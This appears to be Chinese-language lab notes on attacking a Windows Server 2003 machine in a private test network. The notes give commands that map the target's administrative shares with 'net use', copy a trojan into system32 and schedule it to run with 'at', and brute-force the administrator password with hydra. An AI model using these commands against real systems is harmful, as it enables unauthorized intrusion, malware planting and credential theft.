工具
xp一台,ip:192.168.40.122
win2003一台 , ip:192.168.0.116
一、小技巧。
探測端口開沒開着,telnet ip 端口,跳出黑框代表開着了。平常用工具探測。
二、用xp鏈接2003的c$映射到xp的k盤。
net share 可以看到目標開啟了哪些共享文件。
net use \\192.168.0.116\c$,然后輸入目標的賬號和密碼,就能連接上了。可以當網盤使用。
這樣就能把目標的共享資源映射到本地了,這里是分別映射了c$d$與share,為kjl盤。不知道為啥f盤不行。
三、取消盤符映射
net use 盤符 /del或者取消所有net use * /del
四、ipc$連接后可自由選擇傳文件到哪並執行。
1、net use \\192.168.0.116\ipc$
2、制作木馬並植入木馬copy d:\heihei.exe \\192.168.0.116\c$\windows\system32\ // 把本地d盤下的文件復制到目標的c盤\windows\system32\ 下。
3、定時上線:net time \\192.168.0.116 //查看目標機器的系統時間
at \\192.168.0.116 時間(例如16:49)"c: \windows\system32\heihei.exe"
at \\192.168.0.116查看待運行任務。
四、暴力破解目標賬號密碼
可用工具:NTscan,hydra
hydra.exe -l administrator -P e:\pass.txt 192.168.0.116 telnet //爆破密碼
hydra.exe -l 賬號 -P 密碼本 ip 協議(ftp、smb)
hydra.exe -L 賬號字典 -P 密碼字典192.168.0.116 telnet
